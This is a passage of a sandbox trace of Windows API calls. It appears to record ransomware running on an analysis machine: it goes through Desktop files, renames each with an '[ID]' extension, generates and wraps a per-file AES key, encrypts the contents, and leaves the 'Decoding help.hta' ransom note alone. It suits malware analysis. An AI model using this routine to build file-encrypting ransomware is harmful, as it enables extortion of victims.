HALPmcxz\\Desktop\\adEBzQ.avi.[ID]g9uZrLhJaygpwRm1[ID]" [0043.636] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\adEBzQ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\adebzq.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\adEBzQ.avi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\adebzq.avi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\adEBzQ.avi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\adebzq.avi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0043.636] CreateFileMappingA (hFile=0x31c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x318 [0043.637] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x34490b0) returned 1 [0043.637] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x5a5830) returned 1 [0043.637] CryptExportKey (in: hKey=0x5a5830, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0043.637] MapViewOfFile (hFileMappingObject=0x318, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8680) returned 0x4410000 [0043.639] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0043.660] CryptEncrypt (in: hKey=0x5a5830, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000, pdwDataLen=0x51cfce4*=0x8680, dwBufLen=0x8680 | out: pbData=0x4410000*, pdwDataLen=0x51cfce4*=0x8680) returned 1 [0043.660] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.662] CloseHandle (hObject=0x318) returned 1 [0043.662] CryptDestroyKey (hKey=0x5a5830) returned 1 [0043.662] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0043.662] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.662] WriteFile (in: hFile=0x31c, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.662] WriteFile (in: hFile=0x31c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.663] CloseHandle (hObject=0x31c) returned 1 [0043.664] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\adEBzQ.avi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.664] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbbe980, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0xbbbe980, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x9f22600, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0xb34e, dwReserved0=0x0, dwReserved1=0x0, cFileName="C_932.NLS.exe", cAlternateFileName="C_932N~1.EXE")) returned 1 [0043.664] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.664] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.664] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0043.664] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0043.664] lstrcmpiW (lpString1="Decoding help.hta", lpString2="C_932.NLS.exe") returned 1 [0043.664] lstrlenW (lpString="C_932.NLS.exe") returned 13 [0043.664] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.664] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.664] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="C_932.NLS.exe" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe" [0043.664] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe" [0043.664] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0043.665] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c_932.nls.exe"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c_932.nls.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c_932.nls.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.668] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c_932.nls.exe.[id]g9uzrlhjaygpwrm1[id]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c_932.nls.exe")) returned 1 [0043.668] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0043.668] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.668] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.668] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0043.669] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0043.669] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0043.669] lstrlenW (lpString="desktop.ini") returned 11 [0043.669] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.669] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.669] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" [0043.669] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" [0043.669] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0043.669] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0043.670] CreateFileMappingA (hFile=0x31c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x318 [0043.670] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x34490b0) returned 1 [0043.671] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x5a52f0) returned 1 [0043.671] CryptExportKey (in: hKey=0x5a52f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0043.671] MapViewOfFile (hFileMappingObject=0x318, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100) returned 0x4410000 [0043.673] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0043.673] CryptEncrypt (in: hKey=0x5a52f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0x51cfce4*=0x100, dwBufLen=0x100 | out: pbData=0x4410000*, pdwDataLen=0x51cfce4*=0x100) returned 1 [0043.673] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.675] CloseHandle (hObject=0x318) returned 1 [0043.675] CryptDestroyKey (hKey=0x5a52f0) returned 1 [0043.675] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0043.675] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.675] WriteFile (in: hFile=0x31c, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.676] WriteFile (in: hFile=0x31c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.676] CloseHandle (hObject=0x31c) returned 1 [0043.677] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.677] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa10f7cc0, ftCreationTime.dwHighDateTime=0x1d4c67f, ftLastAccessTime.dwLowDateTime=0x4056ae80, ftLastAccessTime.dwHighDateTime=0x1d4c7ce, ftLastWriteTime.dwLowDateTime=0x4056ae80, ftLastWriteTime.dwHighDateTime=0x1d4c7ce, nFileSizeHigh=0x0, nFileSizeLow=0x58a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="dHCMntg.rtf", cAlternateFileName="")) returned 1 [0043.677] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.677] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.678] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0043.678] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0043.678] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dHCMntg.rtf") returned -1 [0043.678] lstrlenW (lpString="dHCMntg.rtf") returned 11 [0043.678] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.678] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.678] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="dHCMntg.rtf" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dHCMntg.rtf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dHCMntg.rtf" [0043.678] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dHCMntg.rtf" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dHCMntg.rtf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dHCMntg.rtf" [0043.678] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dHCMntg.rtf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dHCMntg.rtf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dHCMntg.rtf.[ID]g9uZrLhJaygpwRm1[ID]" [0043.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dHCMntg.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dhcmntg.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dHCMntg.rtf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dhcmntg.rtf.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dHCMntg.rtf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dhcmntg.rtf.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0043.679] CreateFileMappingA (hFile=0x31c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x318 [0043.679] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x34490b0) returned 1 [0043.680] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x5a5830) returned 1 [0043.680] CryptExportKey (in: hKey=0x5a5830, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0043.680] MapViewOfFile (hFileMappingObject=0x318, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x58a0) returned 0x4410000 [0043.681] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0043.681] CryptEncrypt (in: hKey=0x5a5830, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0x51cfce4*=0x58a0, dwBufLen=0x58a0 | out: pbData=0x4410000*, pdwDataLen=0x51cfce4*=0x58a0) returned 1 [0043.682] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.683] CloseHandle (hObject=0x318) returned 1 [0043.683] CryptDestroyKey (hKey=0x5a5830) returned 1 [0043.683] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0043.683] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.684] WriteFile (in: hFile=0x31c, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.684] WriteFile (in: hFile=0x31c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.684] CloseHandle (hObject=0x31c) returned 1 [0043.685] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dHCMntg.rtf.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.685] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf539c50, ftCreationTime.dwHighDateTime=0x1d4cc20, ftLastAccessTime.dwLowDateTime=0x68112e00, ftLastAccessTime.dwHighDateTime=0x1d4cafd, ftLastWriteTime.dwLowDateTime=0x68112e00, ftLastWriteTime.dwHighDateTime=0x1d4cafd, nFileSizeHigh=0x0, nFileSizeLow=0x1464b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Frdn5-oMFGap_Wjgfuj2.ods", cAlternateFileName="FRDN5-~1.ODS")) returned 1 [0043.685] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.686] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.686] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0043.686] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0043.686] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Frdn5-oMFGap_Wjgfuj2.ods") returned -1 [0043.686] lstrlenW (lpString="Frdn5-oMFGap_Wjgfuj2.ods") returned 24 [0043.686] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.686] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.686] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Frdn5-oMFGap_Wjgfuj2.ods" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Frdn5-oMFGap_Wjgfuj2.ods") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Frdn5-oMFGap_Wjgfuj2.ods" [0043.686] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Frdn5-oMFGap_Wjgfuj2.ods" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Frdn5-oMFGap_Wjgfuj2.ods") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Frdn5-oMFGap_Wjgfuj2.ods" [0043.686] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Frdn5-oMFGap_Wjgfuj2.ods", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Frdn5-oMFGap_Wjgfuj2.ods.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Frdn5-oMFGap_Wjgfuj2.ods.[ID]g9uZrLhJaygpwRm1[ID]" [0043.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Frdn5-oMFGap_Wjgfuj2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\frdn5-omfgap_wjgfuj2.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Frdn5-oMFGap_Wjgfuj2.ods.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\frdn5-omfgap_wjgfuj2.ods.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Frdn5-oMFGap_Wjgfuj2.ods.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\frdn5-omfgap_wjgfuj2.ods.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 